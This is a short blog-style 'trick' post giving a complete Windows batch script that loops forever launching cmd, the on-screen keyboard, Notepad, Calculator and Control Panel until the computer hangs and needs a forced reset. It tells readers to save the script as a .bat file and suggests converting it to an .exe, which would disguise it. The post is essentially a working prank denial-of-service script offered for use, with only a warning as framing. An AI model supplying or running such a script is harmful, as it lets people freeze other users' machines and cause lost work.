WARNING: This trick will hang your computer and you will have to force reset your computer…
Open up a notepad from Start > All Programs > Accessories > Notepad
After opening notepad type the following code:
*****************************************************************
@echo off
:Start
START %SystemRoot%\System32\cmd.exe
START %SystemRoot%\System32\osk.exe
START %SystemRoot%\System32\notepad.exe
START %SystemRoot%\System32\calc.exe
START %SystemRoot%\System32\control.exe
GOTO Start
****************************************************************
Save the File by clicking File > Save As…
Save the file with whatever name you want to save “myfile.bat”
You can also save your code by converting your “.bat” to “.exe” using any batch to exe converter…
Have a nice Day Guys….
No comments:
Post a Comment